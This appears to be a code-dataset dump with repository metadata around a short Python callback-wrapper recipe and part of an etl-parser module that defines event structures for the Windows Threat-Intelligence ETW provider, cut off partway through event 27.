| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
ad9d727aa59e2cd0e0826e3e31f883ec3007b0b4
| 238
|
py
|
Python
|
recipes/Python/66521_Avoiding_lambdwriting_callback/recipe-66521.py
|
tdiprima/code
|
61a74f5f93da087d27c70b2efe779ac6bd2a3b4f
|
[
"MIT"
] | 2,023
|
2017-07-29T09:34:46.000Z
|
2022-03-24T08:00:45.000Z
|
recipes/Python/66521_Avoiding_lambdwriting_callback/recipe-66521.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 32
|
2017-09-02T17:20:08.000Z
|
2022-02-11T17:49:37.000Z
|
recipes/Python/66521_Avoiding_lambdwriting_callback/recipe-66521.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 780
|
2017-07-28T19:23:28.000Z
|
2022-03-25T20:39:41.000Z
|
class Command:
def __init__(self, callback, *args, **kwargs):
self.callback = callback
self.args = args
self.kwargs = kwargs
def __call__(self):
return apply(self.callback, self.args, self.kwargs)
| 26.444444
| 59
| 0.62605
| 28
| 238
| 5.035714
| 0.392857
| 0.255319
| 0.22695
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264706
| 238
| 8
| 60
| 29.75
| 0.805714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d1240782072c124b372f24e435b3ad3a747b3b2f
| 31,194
|
py
|
Python
|
etl/parsers/etw/Microsoft_Windows_Threat_Intelligence.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
etl/parsers/etw/Microsoft_Windows_Threat_Intelligence.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
etl/parsers/etw/Microsoft_Windows_Threat_Intelligence.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Threat-Intelligence
GUID : f4e1897c-bb5d-5668-f1d8-040f4d8dd344
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=1, version=0)
class Microsoft_Windows_Threat_Intelligence_1_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=2, version=0)
class Microsoft_Windows_Threat_Intelligence_2_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=3, version=0)
class Microsoft_Windows_Threat_Intelligence_3_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=4, version=0)
class Microsoft_Windows_Threat_Intelligence_4_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"TargetThreadAlertable" / Int8ul,
"ApcRoutine" / Int64ul,
"ApcArgument1" / Int64ul,
"ApcArgument2" / Int64ul,
"ApcArgument3" / Int64ul,
"RealEventTime" / Int64ul,
"ApcRoutineVadQueryResult" / Int32ul,
"ApcRoutineVadAllocationBase" / Int64ul,
"ApcRoutineVadAllocationProtect" / Int32ul,
"ApcRoutineVadRegionType" / Int32ul,
"ApcRoutineVadRegionSize" / Int64ul,
"ApcRoutineVadCommitSize" / Int64ul,
"ApcRoutineVadMmfName" / WString,
"ApcArgument1VadQueryResult" / Int32ul,
"ApcArgument1VadAllocationBase" / Int64ul,
"ApcArgument1VadAllocationProtect" / Int32ul,
"ApcArgument1VadRegionType" / Int32ul,
"ApcArgument1VadRegionSize" / Int64ul,
"ApcArgument1VadCommitSize" / Int64ul,
"ApcArgument1VadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=5, version=0)
class Microsoft_Windows_Threat_Intelligence_5_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"ContextFlags" / Int32ul,
"ContextMask" / Int16ul,
"Pc" / Int64ul,
"Sp" / Int64ul,
"Lr" / Int64ul,
"Fp" / Int64ul,
"Reg0" / Int64ul,
"Reg1" / Int64ul,
"Reg2" / Int64ul,
"Reg3" / Int64ul,
"Reg4" / Int64ul,
"Reg5" / Int64ul,
"Reg6" / Int64ul,
"Reg7" / Int64ul,
"RealEventTime" / Int64ul,
"PcVadQueryResult" / Int32ul,
"PcVadAllocationBase" / Int64ul,
"PcVadAllocationProtect" / Int32ul,
"PcVadRegionType" / Int32ul,
"PcVadRegionSize" / Int64ul,
"PcVadCommitSize" / Int64ul,
"PcVadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=6, version=0)
class Microsoft_Windows_Threat_Intelligence_6_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=7, version=0)
class Microsoft_Windows_Threat_Intelligence_7_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=8, version=0)
class Microsoft_Windows_Threat_Intelligence_8_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=11, version=0)
class Microsoft_Windows_Threat_Intelligence_11_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=12, version=0)
class Microsoft_Windows_Threat_Intelligence_12_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=13, version=0)
class Microsoft_Windows_Threat_Intelligence_13_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=14, version=0)
class Microsoft_Windows_Threat_Intelligence_14_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"BytesCopied" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=15, version=0)
class Microsoft_Windows_Threat_Intelligence_15_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=16, version=0)
class Microsoft_Windows_Threat_Intelligence_16_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=17, version=0)
class Microsoft_Windows_Threat_Intelligence_17_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=18, version=0)
class Microsoft_Windows_Threat_Intelligence_18_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=19, version=0)
class Microsoft_Windows_Threat_Intelligence_19_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=20, version=0)
class Microsoft_Windows_Threat_Intelligence_20_0(Etw):
pattern = Struct(
"OperationStatus" / Int32ul,
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=21, version=0)
class Microsoft_Windows_Threat_Intelligence_21_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=22, version=0)
class Microsoft_Windows_Threat_Intelligence_22_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=23, version=0)
class Microsoft_Windows_Threat_Intelligence_23_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=24, version=0)
class Microsoft_Windows_Threat_Intelligence_24_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"TargetThreadAlertable" / Int8ul,
"ApcRoutine" / Int64ul,
"ApcArgument1" / Int64ul,
"ApcArgument2" / Int64ul,
"ApcArgument3" / Int64ul,
"RealEventTime" / Int64ul,
"ApcRoutineVadQueryResult" / Int32ul,
"ApcRoutineVadAllocationBase" / Int64ul,
"ApcRoutineVadAllocationProtect" / Int32ul,
"ApcRoutineVadRegionType" / Int32ul,
"ApcRoutineVadRegionSize" / Int64ul,
"ApcRoutineVadCommitSize" / Int64ul,
"ApcRoutineVadMmfName" / WString,
"ApcArgument1VadQueryResult" / Int32ul,
"ApcArgument1VadAllocationBase" / Int64ul,
"ApcArgument1VadAllocationProtect" / Int32ul,
"ApcArgument1VadRegionType" / Int32ul,
"ApcArgument1VadRegionSize" / Int64ul,
"ApcArgument1VadCommitSize" / Int64ul,
"ApcArgument1VadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=25, version=0)
class Microsoft_Windows_Threat_Intelligence_25_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"TargetThreadId" / Int32ul,
"TargetThreadCreateTime" / Int64ul,
"ContextFlags" / Int32ul,
"ContextMask" / Int16ul,
"Pc" / Int64ul,
"Sp" / Int64ul,
"Lr" / Int64ul,
"Fp" / Int64ul,
"Reg0" / Int64ul,
"Reg1" / Int64ul,
"Reg2" / Int64ul,
"Reg3" / Int64ul,
"Reg4" / Int64ul,
"Reg5" / Int64ul,
"Reg6" / Int64ul,
"Reg7" / Int64ul,
"RealEventTime" / Int64ul,
"PcVadQueryResult" / Int32ul,
"PcVadAllocationBase" / Int64ul,
"PcVadAllocationProtect" / Int32ul,
"PcVadRegionType" / Int32ul,
"PcVadRegionSize" / Int64ul,
"PcVadCommitSize" / Int64ul,
"PcVadMmfName" / WString
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=26, version=0)
class Microsoft_Windows_Threat_Intelligence_26_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=27, version=0)
class Microsoft_Windows_Threat_Intelligence_27_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
